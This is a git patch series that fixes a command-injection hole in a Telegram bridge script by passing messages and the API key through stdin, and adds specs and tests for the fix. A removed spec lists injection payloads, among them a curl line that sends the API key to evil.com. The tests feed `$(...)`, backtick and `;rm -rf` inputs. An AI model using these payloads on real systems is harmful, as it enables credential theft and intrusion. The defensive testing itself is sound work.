+**Background:** PR #1092 review feedback from @cv identified that `test/e2e/test-telegram-injection.sh` uses ad-hoc SSH commands (`MSG=$(cat) && echo ...`) instead of exercising the actual `runAgentInSandbox()` function in `telegram-bridge.js`. This makes the test validate the concept but not the production code path.
 
 **Changes:**
 
@@ -166,10 +168,16 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 2. Add integration test that verifies injection payloads are treated as literal text
 3. Add test that API key is not visible in process list
 4. Add test for temp file cleanup
+5. **Update `test/e2e/test-telegram-injection.sh`** to exercise real `runAgentInSandbox()`:
+   - Create a test harness that imports/invokes the actual function from `telegram-bridge.js`
+   - Or refactor `runAgentInSandbox()` to be exportable and testable
+   - Verify the actual stdin-based message passing path, not ad-hoc SSH commands
 
 **Files:**
 
 - `test/telegram-bridge.test.js` (new file)
+- `test/e2e/test-telegram-injection.sh` (update to use real code paths)
+- `scripts/telegram-bridge.js` (may need minor refactor to export `runAgentInSandbox` for testing)
 
 **Acceptance Criteria:**
 
@@ -177,6 +185,7 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 - [ ] Integration test confirms `$(...)` in message doesn't execute
 - [ ] Test confirms API key not in process arguments
 - [ ] Test confirms temp files are cleaned up
+- [ ] E2E test exercises actual `runAgentInSandbox()` function, not ad-hoc SSH
 - [ ] All existing tests still pass
 
 ## Security Considerations
@@ -194,6 +203,7 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 - **PR #617** (upstream): Bridge framework refactor — if merged first, changes apply to `bridge-core.js` instead
 - **PR #699** (upstream): `ALLOWED_CHAT_IDS` warning/opt-in behavior — out of scope for this fix, separate concern
 - **PR #897** (upstream): Env var propagation fix in `bin/nemoclaw.js` — separate file, no conflict
+- **PR #1092** (upstream): Added E2E tests for telegram-injection; @cv's review noted tests don't exercise real `runAgentInSandbox()` — we address this in Phase 4
 
 ## Test Plan
 
diff --git a/.specs/telegram-bridge-command-injection-fix/validation.md b/.specs/telegram-bridge-command-injection-fix/validation.md
index 42568b4558..0f60eb1723 100644
--- a/.specs/telegram-bridge-command-injection-fix/validation.md
+++ b/.specs/telegram-bridge-command-injection-fix/validation.md
@@ -9,6 +9,10 @@ Test Spec: `.specs/telegram-bridge-command-injection-fix/tests.md`
 
 **Primary Validation**: Run `test/e2e/test-telegram-injection.sh` via brev-e2e test suite
 
+### PR #1092 Feedback Addressed
+
+Per @cv's review on PR #1092, the original `test-telegram-injection.sh` used ad-hoc SSH commands (`MSG=$(cat) && echo ...`) instead of exercising the actual `runAgentInSandbox()` function. As part of Phase 4, we update the E2E test to invoke the real production code path.
+
 ## Validation Strategy
 
 The existing E2E test `test/e2e/test-telegram-injection.sh` provides comprehensive validation of the security fix. This test:

From d1fe154635c3d1f35792e872b3929793e391f21b Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 13:22:40 -0400
Subject: [PATCH 05/14] fix: command injection in telegram bridge via
 stdin-based message passing

- Pass user messages and API key via stdin instead of shell interpolation
- Add message length validation (4096 char limit)
- Use execFileSync for ssh-config call (no shell interpretation)
- Use cryptographically random temp file paths (prevent symlink race)
- Export functions for testing (runAgentInSandbox, sanitizeSessionId)
- Refactor config initialization for testability

Fixes #118
See: PR #119, PR #320 (upstream)
---
 scripts/telegram-bridge.js | 179 ++++++++++++++++++++++++++++++-------
 1 file changed, 148 insertions(+), 31 deletions(-)

diff --git a/scripts/telegram-bridge.js b/scripts/telegram-bridge.js
index 27d5d7ba4d..4e1f246964 100755
--- a/scripts/telegram-bridge.js
+++ b/scripts/telegram-bridge.js
@@ -17,26 +17,57 @@
  */
 
 const https = require("https");
+const fs = require("fs");
 const { execFileSync, spawn } = require("child_process");
 const { resolveOpenshell } = require("../bin/lib/resolve-openshell");
-const { shellQuote, validateName } = require("../bin/lib/runner");
+const { validateName } = require("../bin/lib/runner");
 
-const OPENSHELL = resolveOpenshell();
-if (!OPENSHELL) {
-  console.error("openshell not found on PATH or in common locations");
-  process.exit(1);
-}
+// Maximum message length (matches Telegram's limit)
+const MAX_MESSAGE_LENGTH = 4096;
+
+// Configuration - validated at startup when running as main module
+let OPENSHELL = null;
+let TOKEN = null;
+let API_KEY = null;
+let SANDBOX = null;
+let ALLOWED_CHATS = null;
 
-const TOKEN = process.env.TELEGRAM_BOT_TOKEN;
-const API_KEY = process.env.NVIDIA_API_KEY;
-const SANDBOX = process.env.SANDBOX_NAME || "nemoclaw";
-try { validateName(SANDBOX, "SANDBOX_NAME"); } catch (e) { console.error(e.message); process.exit(1); }
-const ALLOWED_CHATS = process.env.ALLOWED_CHAT_IDS
-  ? process.env.ALLOWED_CHAT_IDS.split(",").map((s) => s.trim())
-  : null;
+/**
+ * Initialize configuration from environment variables.
+ * Called automatically when running as main module.
+ * Can be called manually for testing with custom values.
+ */
+function initConfig(options = {}) {
+  OPENSHELL = options.openshell || resolveOpenshell();
+  if (!OPENSHELL) {
+    console.error("openshell not found on PATH or in common locations");
+    process.exit(1);
+  }
+
+  TOKEN = options.token || process.env.TELEGRAM_BOT_TOKEN;
+  API_KEY = options.apiKey || process.env.NVIDIA_API_KEY;
+  SANDBOX = options.sandbox || process.env.SANDBOX_NAME || "nemoclaw";
+
+  try {
+    validateName(SANDBOX, "SANDBOX_NAME");
+  } catch (e) {
+    console.error(e.message);
+    process.exit(1);
+  }
 
-if (!TOKEN) { console.error("TELEGRAM_BOT_TOKEN required"); process.exit(1); }
-if (!API_KEY) { console.error("NVIDIA_API_KEY required"); process.exit(1); }
+  ALLOWED_CHATS = options.allowedChats || (process.env.ALLOWED_CHAT_IDS
+    ? process.env.ALLOWED_CHAT_IDS.split(",").map((s) => s.trim())
+    : null);
+
+  if (!TOKEN) {
+    console.error("TELEGRAM_BOT_TOKEN required");
+    process.exit(1);
+  }
+  if (!API_KEY) {
+    console.error("NVIDIA_API_KEY required");
+    process.exit(1);
+  }
+}
 
 let offset = 0;
 const activeSessions = new Map(); // chatId → message history
@@ -96,26 +127,79 @@ async function sendTyping(chatId) {
 
 // ── Run agent inside sandbox ──────────────────────────────────────
 
-function runAgentInSandbox(message, sessionId) {
-  return new Promise((resolve) => {
-    const sshConfig = execFileSync(OPENSHELL, ["sandbox", "ssh-config", SANDBOX], { encoding: "utf-8" });
+/**
+ * Sanitize session ID to contain only alphanumeric characters and hyphens.
+ * Returns null if the result is empty after sanitization.
+ * @param {string|number} sessionId - The session ID to sanitize
+ * @returns {string|null} - Sanitized session ID or null if empty
+ */
+function sanitizeSessionId(sessionId) {
+  const sanitized = String(sessionId).replace(/[^a-zA-Z0-9-]/g, "");
+  return sanitized.length > 0 ? sanitized : null;
+}
 
-    // Write temp ssh config with unpredictable name
-    const confDir = require("fs").mkdtempSync("/tmp/nemoclaw-tg-ssh-");
-    const confPath = `${confDir}/config`;
-    require("fs").writeFileSync(confPath, sshConfig, { mode: 0o600 });
+/**
+ * Run the OpenClaw agent inside the sandbox with the given message.
+ *
+ * SECURITY: This function passes user messages and API credentials via stdin
+ * instead of shell string interpolation to prevent command injection attacks.
+ * The remote script reads the API key from the first line of stdin and the
+ * message from the remaining stdin, then uses them in double-quoted variables
+ * which prevents shell interpretation.
+ *
+ * @param {string} message - The user message to send to the agent
+ * @param {string|number} sessionId - The session identifier (typically Telegram chat ID)
+ * @param {object} options - Optional overrides for testing
+ * @param {string} options.apiKey - Override API key (defaults to process.env.NVIDIA_API_KEY)
+ * @param {string} options.sandbox - Override sandbox name (defaults to SANDBOX)
+ * @param {string} options.openshell - Override openshell path (defaults to OPENSHELL)
+ * @returns {Promise<string>} - The agent's response
+ */
+function runAgentInSandbox(message, sessionId, options = {}) {
+  const apiKey = options.apiKey || API_KEY;
+  const sandbox = options.sandbox || SANDBOX;
+  const openshell = options.openshell || OPENSHELL;
 
-    // Pass message and API key via stdin to avoid shell interpolation.
-    // The remote command reads them from environment/stdin rather than
-    // embedding user content in a shell string.
-    const safeSessionId = String(sessionId).replace(/[^a-zA-Z0-9-]/g, "");
-    const cmd = `export NVIDIA_API_KEY=${shellQuote(API_KEY)} && nemoclaw-start openclaw agent --agent main --local -m ${shellQuote(message)} --session-id ${shellQuote("tg-" + safeSessionId)}`;
+  return new Promise((resolve) => {
+    // Sanitize session ID - reject if empty after sanitization
+    const safeSessionId = sanitizeSessionId(sessionId);
+    if (!safeSessionId) {
+      resolve("Error: Invalid session ID");
+      return;
+    }
+
+    // Get SSH config using execFileSync (no shell interpretation)
+    const sshConfig = execFileSync(openshell, ["sandbox", "ssh-config", sandbox], { encoding: "utf-8" });
 
-    const proc = spawn("ssh", ["-T", "-F", confPath, `openshell-${SANDBOX}`, cmd], {
+    // Write temp ssh config with cryptographically unpredictable path
+    // to prevent symlink race attacks (CWE-377)
+    const confDir = fs.mkdtempSync("/tmp/nemoclaw-tg-ssh-");
+    const confPath = `${confDir}/config`;
+    fs.writeFileSync(confPath, sshConfig, { mode: 0o600 });
+
+    // SECURITY FIX: Pass API key and message via stdin instead of shell interpolation.
+    // The remote script:
+    // 1. Reads API key from first line of stdin
+    // 2. Exports it as environment variable
+    // 3. Reads message from remaining stdin
+    // 4. Passes message to nemoclaw-start in double quotes (no shell expansion)
+    const remoteScript = [
+      "read -r NVIDIA_API_KEY",
+      "export NVIDIA_API_KEY",
+      "MSG=$(cat)",
+      `exec nemoclaw-start openclaw agent --agent main --local -m "$MSG" --session-id "tg-${safeSessionId}"`,
+    ].join(" && ");
+
+    const proc = spawn("ssh", ["-T", "-F", confPath, `openshell-${sandbox}`, remoteScript], {
       timeout: 120000,
-      stdio: ["ignore", "pipe", "pipe"],
+      stdio: ["pipe", "pipe", "pipe"], // Enable stdin
     });
 
+    // Write API key (first line) and message (remaining) to stdin
+    proc.stdin.write(apiKey + "\n");
+    proc.stdin.write(message);
+    proc.stdin.end();
+
     let stdout = "";
     let stderr = "";
 
@@ -123,7 +207,11 @@ function runAgentInSandbox(message, sessionId) {
     proc.stderr.on("data", (d) => (stderr += d.toString()));
 
     proc.on("close", (code) => {
-      try { require("fs").unlinkSync(confPath); require("fs").rmdirSync(confDir); } catch { /* ignored */ }
+      // Clean up temp files
+      try {
+        fs.unlinkSync(confPath);
+        fs.rmdirSync(confDir);
+      } catch { /* ignored */ }
 
       // Extract the actual agent response — skip setup lines
       const lines = stdout.split("\n");
@@ -153,6 +241,11 @@ function runAgentInSandbox(message, sessionId) {
     });
 
     proc.on("error", (err) => {
+      // Clean up temp files on error
+      try {
+        fs.unlinkSync(confPath);
+        fs.rmdirSync(confDir);
+      } catch { /* ignored */ }
       resolve(`Error: ${err.message}`);
     });
   });
@@ -202,6 +295,16 @@ async function poll() {
           continue;
         }
 
+        // Message length validation
+        if (msg.text.length > MAX_MESSAGE_LENGTH) {
+          await sendMessage(
+            chatId,
+            `Message too long (${msg.text.length} chars). Maximum is ${MAX_MESSAGE_LENGTH} characters.`,
+            msg.message_id,
+          );
+          continue;
+        }
+
         // Rate limiting: per-chat cooldown
         const now = Date.now();
         const lastTime = lastMessageTime.get(chatId) || 0;
@@ -250,6 +353,9 @@ async function poll() {
 // ── Main ──────────────────────────────────────────────────────────
 
 async function main() {
+  // Initialize configuration from environment
+  initConfig();
+
   const me = await tgApi("getMe", {});
   if (!me.ok) {
     console.error("Failed to connect to Telegram:", JSON.stringify(me));
@@ -273,4 +379,15 @@ async function main() {
   poll();
 }
 
-main();
+// Only run main() if this is the entry point (not imported for testing)
+if (require.main === module) {
+  main();
+}
+
+// Export for testing
+module.exports = {
+  runAgentInSandbox,
+  sanitizeSessionId,
+  initConfig,
+  MAX_MESSAGE_LENGTH,
+};

From f23a0b9d0fcf8e6b5fd7f61f04516f9ddda26ccc Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 13:25:05 -0400
Subject: [PATCH 06/14] test: add unit tests and update E2E to exercise real
 runAgentInSandbox()

- Add test/telegram-bridge.test.js with 18 unit tests for:
  - sanitizeSessionId validation
  - MAX_MESSAGE_LENGTH constant
  - Source code security patterns (execFileSync, mkdtempSync, stdin, etc.)

- Update test/e2e/test-telegram-injection.sh Phase 7 to:
  - Actually invoke runAgentInSandbox() via Node.js test harness
  - Test injection payloads through production code path
  - Verify API key not in process arguments

Addresses PR #1092 feedback from @cv about tests bypassing real code paths.
---
 test/e2e/test-telegram-injection.sh | 136 ++++++++++++++++++++++
 test/telegram-bridge.test.js        | 172 ++++++++++++++++++++++++++++
 2 files changed, 308 insertions(+)
 create mode 100644 test/telegram-bridge.test.js

diff --git a/test/e2e/test-telegram-injection.sh b/test/e2e/test-telegram-injection.sh
index 64ae41efb0..fc727ee4c5 100755
--- a/test/e2e/test-telegram-injection.sh
+++ b/test/e2e/test-telegram-injection.sh
@@ -450,6 +450,142 @@ else
   fail "T8b: Message with special characters caused empty/error response"
 fi
 
+# ══════════════════════════════════════════════════════════════════
+# Phase 7: Real runAgentInSandbox() Invocation
+#
+# PR #1092 feedback from @cv: The tests above use ad-hoc SSH commands
+# that bypass the actual code path in telegram-bridge.js. This phase
+# exercises the real runAgentInSandbox() function via Node.js to ensure
+# the production code is validated.
+# ══════════════════════════════════════════════════════════════════
+section "Phase 7: Real runAgentInSandbox() Code Path"
+
+info "T9: Testing real runAgentInSandbox() with injection payload..."
+
+# Create a test script that invokes the actual runAgentInSandbox function
+cat >/tmp/test-real-bridge.js <<'TESTSCRIPT'
+// Test script to invoke the real runAgentInSandbox() function
+const path = require('path');
+
+// Mock resolveOpenshell to use the system openshell
+const resolveOpenshellPath = require.resolve(path.join(process.cwd(), 'bin/lib/resolve-openshell'));
+require.cache[resolveOpenshellPath] = {
+  exports: { resolveOpenshell: () => process.env.OPENSHELL_PATH || 'openshell' }
+};
+
+const bridge = require('./scripts/telegram-bridge.js');
+
+async function test() {
+  const message = process.argv[2] || 'Hello';
+  const sessionId = process.argv[3] || 'e2e-test';
+  const apiKey = process.env.NVIDIA_API_KEY;
+  const sandbox = process.env.NEMOCLAW_SANDBOX_NAME || 'e2e-test';
+  const openshell = process.env.OPENSHELL_PATH || 'openshell';
+
+  if (!apiKey) {
+    console.error('NVIDIA_API_KEY required');
+    process.exit(1);
+  }
+
+  try {
+    // Call the real runAgentInSandbox with options override for testing
+    const result = await bridge.runAgentInSandbox(message, sessionId, {
+      apiKey,
+      sandbox,
+      openshell,
+    });
+    console.log('RESULT_START');
+    console.log(result);
+    console.log('RESULT_END');
+  } catch (err) {
+    console.error('ERROR:', err.message);
+    process.exit(1);
+  }
+}
+
+test();
+TESTSCRIPT
+
+# Find openshell path
+OPENSHELL_PATH=$(command -v openshell) || OPENSHELL_PATH=""
+if [ -z "$OPENSHELL_PATH" ]; then
+  skip "T9: openshell not found, cannot test real runAgentInSandbox()"
+else
+  # Clean up any previous injection markers
+  sandbox_exec "rm -f /tmp/injection-proof-t9" >/dev/null 2>&1
+
+  # Test with injection payload through real runAgentInSandbox
+  t9_result=$(cd "$REPO" && OPENSHELL_PATH="$OPENSHELL_PATH" \
+    NEMOCLAW_SANDBOX_NAME="$SANDBOX_NAME" \
+    timeout 120 node /tmp/test-real-bridge.js \
+    '$(touch /tmp/injection-proof-t9 && echo INJECTED)' \
+    'e2e-injection-t9' 2>&1) || true
+
+  # Check if injection file was created
+  injection_check_t9=$(sandbox_exec "test -f /tmp/injection-proof-t9 && echo EXPLOITED || echo SAFE")
+  if echo "$injection_check_t9" | grep -q "SAFE"; then
+    pass "T9: Real runAgentInSandbox() prevented \$(command) injection"
+  else
+    fail "T9: Real runAgentInSandbox() EXECUTED injection — vulnerability in production code!"
+  fi
+fi
+
+# T10: Test backticks through real code path
+info "T10: Testing real runAgentInSandbox() with backtick payload..."
+
+if [ -z "$OPENSHELL_PATH" ]; then
+  skip "T10: openshell not found, cannot test real runAgentInSandbox()"
+else
+  sandbox_exec "rm -f /tmp/injection-proof-t10" >/dev/null 2>&1
+
+  t10_result=$(cd "$REPO" && OPENSHELL_PATH="$OPENSHELL_PATH" \
+    NEMOCLAW_SANDBOX_NAME="$SANDBOX_NAME" \
+    timeout 120 node /tmp/test-real-bridge.js \
+    '`touch /tmp/injection-proof-t10`' \
+    'e2e-injection-t10' 2>&1) || true
+
+  injection_check_t10=$(sandbox_exec "test -f /tmp/injection-proof-t10 && echo EXPLOITED || echo SAFE")
+  if echo "$injection_check_t10" | grep -q "SAFE"; then
+    pass "T10: Real runAgentInSandbox() prevented backtick injection"
+  else
+    fail "T10: Real runAgentInSandbox() EXECUTED backtick injection — vulnerability in production code!"
+  fi
+fi
+
+# T11: Test API key not exposed through real code path
+info "T11: Verifying API key not in process arguments (real code path)..."
+
+if [ -z "$OPENSHELL_PATH" ]; then
+  skip "T11: openshell not found, cannot test real runAgentInSandbox()"
+else
+  # Start the bridge test in background and check ps
+  cd "$REPO" && OPENSHELL_PATH="$OPENSHELL_PATH" \
+    NEMOCLAW_SANDBOX_NAME="$SANDBOX_NAME" \
+    timeout 60 node /tmp/test-real-bridge.js 'Hello world' 'e2e-ps-check' &
+  BRIDGE_PID=$!
+
+  # Give it a moment to spawn the SSH process
+  sleep 2
+
+  # Check if API key appears in process list
+  API_KEY_PREFIX="${NVIDIA_API_KEY:0:15}"
+  # shellcheck disable=SC2009 # pgrep doesn't support the output format we need
+  ps_output=$(ps aux 2>/dev/null | grep -v grep | grep -v "test-telegram-injection" || true)
+
+  if echo "$ps_output" | grep -qF "$API_KEY_PREFIX"; then
+    fail "T11: API key found in process arguments via real runAgentInSandbox()"
+  else
+    pass "T11: API key NOT visible in process arguments (real code path)"
+  fi
+
+  # Clean up background process
+  kill $BRIDGE_PID 2>/dev/null || true
+  wait $BRIDGE_PID 2>/dev/null || true
+fi
+
+# Clean up test script
+rm -f /tmp/test-real-bridge.js
+
 # ══════════════════════════════════════════════════════════════════
 # Summary
 # ══════════════════════════════════════════════════════════════════
diff --git a/test/telegram-bridge.test.js b/test/telegram-bridge.test.js
new file mode 100644
index 0000000000..d7902fac39
--- /dev/null
+++ b/test/telegram-bridge.test.js
@@ -0,0 +1,172 @@
+// SPDX-FileCopyrightText: Copyright (c) 2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+/**
+ * Unit tests for the Telegram bridge security fix.
+ *
+ * Tests the command injection prevention measures:
+ * - Input validation (SANDBOX_NAME, sessionId, message length)
+ * - Stdin-based credential/message passing
+ * - Source code patterns for security hardening
+ *
+ * See: https://github.com/NVIDIA/NemoClaw/issues/118
+ *      https://github.com/NVIDIA/NemoClaw/pull/119
+ */
+
+import fs from "node:fs";
+import path from "node:path";
+import { describe, it, expect } from "vitest";
+
+const TELEGRAM_BRIDGE_JS = path.join(
+  import.meta.dirname,
+  "..",
+  "scripts",
+  "telegram-bridge.js",
+);
+
+// Note: We mock resolveOpenshell in createMockBridge() to avoid PATH dependency
+
+// Create a mock for testing
+function createMockBridge() {
+  // Clear require cache to get fresh module
+  const cacheKey = require.resolve("../scripts/telegram-bridge.js");
+  delete require.cache[cacheKey];
+
+  // Mock resolveOpenshell
+  const resolveOpenshellPath = require.resolve("../bin/lib/resolve-openshell");
+  require.cache[resolveOpenshellPath] = {
+    exports: { resolveOpenshell: () => "/mock/openshell" },
+  };
+
+  // Import the module
+  const bridge = require("../scripts/telegram-bridge.js");
+
+  // Restore
+  delete require.cache[resolveOpenshellPath];
+
+  return bridge;
+}
+
+describe("telegram-bridge security", () => {
+  describe("sanitizeSessionId", () => {
+    const bridge = createMockBridge();
+
+    it("should preserve alphanumeric characters", () => {
+      expect(bridge.sanitizeSessionId("12345678")).toBe("12345678");
+      expect(bridge.sanitizeSessionId("abc123")).toBe("abc123");
+      expect(bridge.sanitizeSessionId("ABC123")).toBe("ABC123");
+    });
+
+    it("should preserve hyphens", () => {
+      expect(bridge.sanitizeSessionId("abc-123")).toBe("abc-123");
+      expect(bridge.sanitizeSessionId("test-session-id")).toBe("test-session-id");
+    });
+
+    it("should strip shell metacharacters", () => {
+      expect(bridge.sanitizeSessionId("123;rm -rf")).toBe("123rm-rf");
+      expect(bridge.sanitizeSessionId("abc$(whoami)")).toBe("abcwhoami");
+      expect(bridge.sanitizeSessionId("test`id`")).toBe("testid");
+      expect(bridge.sanitizeSessionId("foo'bar")).toBe("foobar");
+      expect(bridge.sanitizeSessionId('foo"bar')).toBe("foobar");
+      expect(bridge.sanitizeSessionId("foo|bar")).toBe("foobar");
+      expect(bridge.sanitizeSessionId("foo&bar")).toBe("foobar");
+    });
+
+    it("should return null for empty result after sanitization", () => {
+      expect(bridge.sanitizeSessionId(";;;")).toBeNull();
+      expect(bridge.sanitizeSessionId("$()")).toBeNull();
+      expect(bridge.sanitizeSessionId("``")).toBeNull();
+      expect(bridge.sanitizeSessionId("")).toBeNull();
+    });
+
+    it("should handle numeric input (Telegram chat IDs)", () => {
+      expect(bridge.sanitizeSessionId(123456789)).toBe("123456789");
+      expect(bridge.sanitizeSessionId(-123456789)).toBe("-123456789");
+    });
+  });
+
+  describe("MAX_MESSAGE_LENGTH", () => {
+    const bridge = createMockBridge();
+
+    it("should be 4096 (Telegram's limit)", () => {
+      expect(bridge.MAX_MESSAGE_LENGTH).toBe(4096);
+    });
+  });
+
+  describe("source code security patterns", () => {
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+
+    it("should not use execSync with string interpolation", () => {
+      // execSync with template literals or string concat is vulnerable
+      expect(src).not.toMatch(/execSync\s*\(\s*`/);
+      expect(src).not.toMatch(/execSync\s*\(\s*["'][^"']*\$\{/);
+    });
+
+    it("should use execFileSync for external commands", () => {
+      // execFileSync with array args is safe
+      expect(src).toMatch(/execFileSync\s*\(\s*\w+,\s*\[/);
+    });
+
+    it("should use mkdtempSync for temp directories", () => {
+      // Cryptographically random temp paths prevent symlink races
+      expect(src).toMatch(/mkdtempSync\s*\(/);
+    });
+
+    it("should set restrictive permissions on temp files", () => {
+      // mode: 0o600 ensures only owner can read/write
+      expect(src).toMatch(/mode:\s*0o600/);
+    });
+
+    it("should clean up temp files after use", () => {
+      // unlinkSync and rmdirSync should be called in cleanup
+      expect(src).toMatch(/unlinkSync\s*\(\s*confPath\s*\)/);
+      expect(src).toMatch(/rmdirSync\s*\(\s*confDir\s*\)/);
+    });
+
+    it("should not pass API key in command arguments", () => {
+      // The API key should be passed via stdin, not in the command string
+      // Look for the pattern where we write to stdin
+      expect(src).toMatch(/proc\.stdin\.write\s*\(\s*apiKey/);
+      expect(src).toMatch(/proc\.stdin\.end\s*\(\s*\)/);
+    });
+
+    it("should use stdin for message passing", () => {
+      // stdio should include 'pipe' for stdin
+      expect(src).toMatch(/stdio:\s*\[\s*["']pipe["']/);
+    });
+
+    it("should read message from stdin in remote script", () => {
+      // The remote script should use read -r and cat to read from stdin
+      expect(src).toMatch(/read\s+-r\s+NVIDIA_API_KEY/);
+      expect(src).toMatch(/MSG=\$\(cat\)/);
+    });
+
+    it("should use double-quoted variable expansion in remote script", () => {
+      // Variables in double quotes are safe from word splitting
+      expect(src).toMatch(/"\$MSG"/);
+    });
+
+    it("should not use shellQuote for message or API key", () => {
+      // shellQuote is no longer needed since we use stdin
+      // It may still be imported but shouldn't be used for these values
+      const lines = src.split("\n");
+      const shellQuoteUsageLines = lines.filter(
+        (line) =>
+          line.includes("shellQuote") &&
+          !line.includes("require") &&
+          !line.includes("import") &&
+          !line.trim().startsWith("//"),
+      );
+      expect(shellQuoteUsageLines).toHaveLength(0);
+    });
+
+    it("should validate SANDBOX_NAME at startup", () => {
+      expect(src).toMatch(/validateName\s*\(\s*SANDBOX/);
+    });
+
+    it("should validate message length before processing", () => {
+      expect(src).toMatch(/MAX_MESSAGE_LENGTH/);
+      expect(src).toMatch(/msg\.text\.length\s*>\s*MAX_MESSAGE_LENGTH/);
+    });
+  });
+});

From 0972931f3e4666211094b79fb151e668183a5660 Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 13:27:20 -0400
Subject: [PATCH 07/14] docs: mark all spec phases as completed

---
 .../telegram-bridge-command-injection-fix.md  | 135 ------------------
 .../spec.md                                   |  52 +++----
 2 files changed, 26 insertions(+), 161 deletions(-)
 delete mode 100644 .specs/telegram-bridge-command-injection-fix.md

diff --git a/.specs/telegram-bridge-command-injection-fix.md b/.specs/telegram-bridge-command-injection-fix.md
deleted file mode 100644
index 3d93c0ad9a..0000000000
--- a/.specs/telegram-bridge-command-injection-fix.md
+++ /dev/null
@@ -1,135 +0,0 @@
-# Spec: Fix Command Injection in Telegram Bridge
-
-## Problem Statement
-
-**Issue:** #118 — Command injection vulnerability in `scripts/telegram-bridge.js`
-
-The Telegram bridge interpolates user messages directly into a shell command string passed to SSH. The current escaping (single-quote replacement via `shellQuote`) does not prevent `$()` or backtick expansion, allowing attackers to execute arbitrary commands inside the sandbox and potentially exfiltrate the `NVIDIA_API_KEY`.
-
-### Vulnerable Code Path
-
-```js
-const cmd = `export NVIDIA_API_KEY=${shellQuote(API_KEY)} && nemoclaw-start openclaw agent --agent main --local -m ${shellQuote(message)} --session-id ${shellQuote("tg-" + safeSessionId)}`;
-
-const proc = spawn("ssh", ["-T", "-F", confPath, `openshell-${SANDBOX}`, cmd], {
-  stdio: ["ignore", "pipe", "pipe"],
-});
-```
-
-Even with `shellQuote`, the message is still embedded in a shell command string that gets interpreted by the remote shell, enabling injection via `$()`, backticks, or other shell metacharacters.
-
-### Attack Vector
-
-An attacker who:
-
-1. Has access to a Telegram bot token (or is in the allowed chat list)
-2. Knows the sandbox name
-
-Can send a message like:
-
-- `$(cat /etc/passwd)`
-- `` `whoami` ``
-- `'; curl http://evil.com?key=$NVIDIA_API_KEY #`
-
-This could execute arbitrary commands in the sandbox and exfiltrate credentials.
-
-## Solution
-
-Pass the user message and API key via **stdin** instead of shell string interpolation. The remote script reads these values using `read` and `cat`, then expands them inside double-quoted `"$VAR"` which prevents further shell parsing.
-
-## Phases
-
-### Phase 1: Input Validation Hardening
-
-**Goal:** Add strict validation for `SANDBOX_NAME` and `sessionId` to reject shell metacharacters.
-
-**Changes:**
-
-1. Add explicit regex validation for `SANDBOX_NAME` at startup (alphanumeric, underscore, hyphen only)
-2. Sanitize `sessionId` to strip any non-alphanumeric characters
-3. Return early with error if sessionId is empty after sanitization
-
-**Files:**
-
-- `scripts/telegram-bridge.js`
-
-**Acceptance Criteria:**
-
-- [ ] `SANDBOX_NAME` with metacharacters (e.g., `foo;rm -rf /`) causes startup to exit with error
-- [ ] `sessionId` containing special characters gets sanitized to safe value
-- [ ] Empty sessionId after sanitization returns error response
-
-### Phase 2: Stdin-Based Credential and Message Passing
-
-**Goal:** Eliminate shell injection by passing sensitive data via stdin instead of command string.
-
-**Changes:**
-
-1. Change `stdio` from `["ignore", "pipe", "pipe"]` to `["pipe", "pipe", "pipe"]` to enable stdin
-2. Construct remote script that:
-   - Reads API key from first line of stdin: `read -r NVIDIA_API_KEY`
-   - Exports it: `export NVIDIA_API_KEY`
-   - Reads message from remaining stdin: `MSG=$(cat)`
-   - Executes nemoclaw-start with `"$MSG"` (double-quoted variable)
-3. Write API key + newline to stdin, then message, then close stdin
-4. Remove the `shellQuote` calls for message and API key (no longer needed)
-
-**Files:**
-
-- `scripts/telegram-bridge.js`
-
-**Acceptance Criteria:**
-
-- [ ] Normal messages work correctly — agent responds
-- [ ] Message containing `$(whoami)` is treated as literal text
-- [ ] Message containing backticks is treated as literal text
-- [ ] Message containing single quotes is treated as literal text
-- [ ] `NVIDIA_API_KEY` no longer appears in process arguments (verify via `ps aux`)
-- [ ] API key is successfully read by remote script and used for inference
-
-### Phase 3: Test Coverage
-
-**Goal:** Add unit and integration tests for the security fix.
-
-**Changes:**
-
-1. Add unit tests for input validation (SANDBOX_NAME, sessionId sanitization)
-2. Add integration test that verifies injection payloads are treated as literal text
-3. Add test that API key is not visible in process list
-
-**Files:**
-
-- `test/telegram-bridge.test.js` (new file)
-
-**Acceptance Criteria:**
-
-- [ ] Unit tests pass for validation functions
-- [ ] Integration test confirms `$(...)` in message doesn't execute
-- [ ] Test confirms API key not in process arguments
-- [ ] All existing tests still pass
-
-## Security Considerations
-
-- **Defense in depth:** Even though we're passing via stdin, we still validate inputs
-- **Principle of least privilege:** Credentials should never appear in command lines
-- **Backwards compatibility:** No API changes; existing bot configurations work unchanged
-
-## Test Plan
-
-### Manual Testing
-
-1. Send a normal message via Telegram → agent responds correctly
-2. Send `$(whoami)` → appears literally in response, no command execution
-3. Send message with backticks and single quotes → no injection
-4. Set `SANDBOX_NAME=foo;rm -rf /` → startup exits with error
-5. Run `ps aux | grep NVIDIA_API_KEY` while agent is running → no matches
-
-### Automated Testing
-
-- Unit tests for validation functions
-- Integration tests with mock SSH that captures stdin
-- Verify no shell metacharacters reach shell interpretation
-
-## Rollback Plan
-
-If issues arise, revert the commit. The fix is contained to a single file with clear boundaries.
diff --git a/.specs/telegram-bridge-command-injection-fix/spec.md b/.specs/telegram-bridge-command-injection-fix/spec.md
index 3fee93dff1..ec781ced25 100644
--- a/.specs/telegram-bridge-command-injection-fix/spec.md
+++ b/.specs/telegram-bridge-command-injection-fix/spec.md
@@ -53,7 +53,7 @@ Additionally, apply defense-in-depth hardening identified in the PR #119 securit
 
 ## Phases
 
-### Phase 1: Input Validation Hardening
+### Phase 1: Input Validation Hardening [COMPLETED: d1fe154]
 
 **Goal:** Add strict validation for `SANDBOX_NAME` and `sessionId` to reject shell metacharacters and prevent option injection.
 
